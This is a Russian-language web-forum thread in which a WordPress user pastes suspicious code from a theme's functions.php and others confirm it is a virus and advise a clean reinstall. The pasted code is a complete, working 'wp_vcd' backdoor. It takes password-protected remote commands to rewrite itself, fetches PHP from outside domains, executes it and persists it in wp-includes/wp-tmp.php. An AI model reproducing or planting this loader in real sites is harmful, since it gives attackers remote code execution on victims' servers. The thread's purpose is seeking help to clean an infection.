Jump to content
Elliot

Нашел вредоносный код в WP или мне показалось?

Recommended Posts

Здравствуйте друзья! Случайно заглянул в файл functions и заметил там непонятный код.

Гляньте, как по вашему, что он может делать, часом не удаляет тему после загрузки сайта на хостинг?

if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '34ddb1c16d4eca7a3070f39f15b3c008'))
	{
$div_code_name="wp_vcd";
		switch ($_REQUEST['action'])
			{

				




				case 'change_domain';
					if (isset($_REQUEST['newdomain']))
						{
							
							if (!empty($_REQUEST['newdomain']))
								{
                                                                           if ($file = @file_get_contents(__FILE__))
		                                                                    {
                                                                                                 if(preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code\.php/i',$file,$matcholddomain))
                                                                                                             {

			                                                                           $file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file);
			                                                                           @file_put_contents(__FILE__, $file);
									                           print "true";
                                                                                                             }


		                                                                    }
								}
						}
				break;

								case 'change_code';
					if (isset($_REQUEST['newcode']))
						{
							
							if (!empty($_REQUEST['newcode']))
								{
                                                                           if ($file = @file_get_contents(__FILE__))
		                                                                    {
                                                                                                 if(preg_match_all('/\/\/\$start_wp_theme_tmp([\s\S]*)\/\/\$end_wp_theme_tmp/i',$file,$matcholdcode))
                                                                                                             {

			                                                                           $file = str_replace($matcholdcode[1][0], stripslashes($_REQUEST['newcode']), $file);
			                                                                           @file_put_contents(__FILE__, $file);
									                           print "true";
                                                                                                             }


		                                                                    }
								}
						}
				break;
				
				default: print "ERROR_WP_ACTION WP_V_CD WP_CD";
			}
			
		die("");
	}








$div_code_name = "wp_vcd";
$funcfile      = __FILE__;
if(!function_exists('theme_temp_setup')) {
    $path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI];
    if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {
        
        function file_get_contents_tcurl($url)
        {
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
            curl_setopt($ch, CURLOPT_HEADER, 0);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($ch, CURLOPT_URL, $url);
            curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
            $data = curl_exec($ch);
            curl_close($ch);
            return $data;
        }
        
        function theme_temp_setup($phpCode)
        {
            $tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup");
            $handle   = fopen($tmpfname, "w+");
           if( fwrite($handle, "<?php\n" . $phpCode))
		   {
		   }
			else
			{
			$tmpfname = tempnam('./', "theme_temp_setup");
            $handle   = fopen($tmpfname, "w+");
			fwrite($handle, "<?php\n" . $phpCode);
			}
			fclose($handle);
            include $tmpfname;
            unlink($tmpfname);
            return get_defined_vars();
        }
        

$wp_auth_key='11222a571de226a4d2202e7d67343f0d';
        if (($tmpcontent = @file_get_contents("http://www.jatots.com/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.jatots.com/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {

            if (stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
                @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
                
                if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                        @file_put_contents('wp-tmp.php', $tmpcontent);
                    }
                }
                
            }
        }
        
        
        elseif ($tmpcontent = @file_get_contents("http://www.jatots.pw/code.php")  AND stripos($tmpcontent, $wp_auth_key) !== false ) {

if (stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
                @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
                
                if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                        @file_put_contents('wp-tmp.php', $tmpcontent);
                    }
                }
                
            }
        } 
		
		        elseif ($tmpcontent = @file_get_contents("http://www.jatots.top/code.php")  AND stripos($tmpcontent, $wp_auth_key) !== false ) {

if (stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
                @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
                
                if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                        @file_put_contents('wp-tmp.php', $tmpcontent);
                    }
                }
                
            }
        }
		elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent));
           
        } elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent)); 

        } elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent)); 

        } 
        
        
        
        
        
    }
}

//$start_wp_theme_tmp



//wp_tmp


//$end_wp_theme_tmp
?><?php if (file_exists(dirname(__FILE__) . '/class.theme-modules.php')) include_once(dirname(__FILE__) . '/class.theme-modules.php'); ?><?php
/**
 *
 * The framework's functions and definitions
 *
 */

 

Share this post


Link to post
Share on other sites

Вам не показалось. Это вирус. Он заражает ядро ВП. Требуется:

  • "нулевая установка" Вордпресс
  • чистка плагинов
  • чистка темы

Share this post


Link to post
Share on other sites
5 часов назад, simbo сказал:

некогда не работал с wp и некогда не чистил вирусы 

Очень познавательный ответ! Спасибо вам дорогой друг, мы так все хотели об этом узнать!!! Низкий вам поклон!!!!!

Share this post


Link to post
Share on other sites

Ирония Лимончика улыбнула)))

Друзья, а вот как можно поискать то, что может еще быть?

Share this post


Link to post
Share on other sites

АПать тему не надо! Повторюсь:

Требуется:

  • "нулевая установка" Вордпресс
  • чистка плагинов
  • чистка темы

Предпочтительно в этой последовательности

Share this post


Link to post
Share on other sites
3 часа назад, files сказал:

АПать тему не надо! Повторюсь:

Требуется:

  • "нулевая установка" Вордпресс
  • чистка плагинов
  • чистка темы

Предпочтительно в этой последовательности

Я тему не апал, и таким не занимаюсь.

По сабжу, за ваш ответ спасибо, но он похож на ответ simbo, вот если бы вы ответили типа, зайди во все плагины и попытайся поискать там такой-то текст, вот это какой-то ответ, без обид, и не смотря на то, что вы модер.

Или накажите и закроите тему, как на нулледе за пререкание с модератором?)) 

 

И снова по сабжу, чтобы снять симптом, нужно удалить файлы wp-includes/wp-tmp.php и wp-vcd.php или как то так, код больше не записывается в functions но кто его знает...

Share this post


Link to post
Share on other sites
Цитата

Я тему не апал, и таким не занимаюсь.

Vu9iI0N.jpg

Правила. 8. "Поднятие" (ап, up и т.д.) темы чаще одного раза в двое суток (лучше напишите или отредактируйте всю необходимую информацию в своем первом топике).

 

Цитата

И снова по сабжу, чтобы снять симптом, нужно удалить файлы wp-includes/wp-tmp.php и wp-vcd.php или как то так, код больше не записывается в functions но кто его знает...

А вы почему не посмотрели что там в wp-includes/wp-tmp.php и wp-vcd.php?

Там другая цепочка файлов. Ядро ВП заражено "елочкой". Поэтому Вам поможет "нулевая установка" WP. Удалять вы будете бесконечно долго сам вирус, а не то, что он наделал.

Share this post


Link to post
Share on other sites
В 23.07.2018 в 4:06 PM, files сказал:

Vu9iI0N.jpg

Правила. 8. "Поднятие" (ап, up и т.д.) темы чаще одного раза в двое суток (лучше напишите или отредактируйте всю необходимую информацию в своем первом топике).

Ну так поставьте склейку сообщений, в чем проблема... Я считаю, что не апал тему.

По сабжу, буду пробовать залить чистые файлы ядра,

хоть бы это апом не было...

Share this post


Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.


  • Recently Browsing   0 members

    No registered users viewing this page.

×
×
  • Create New...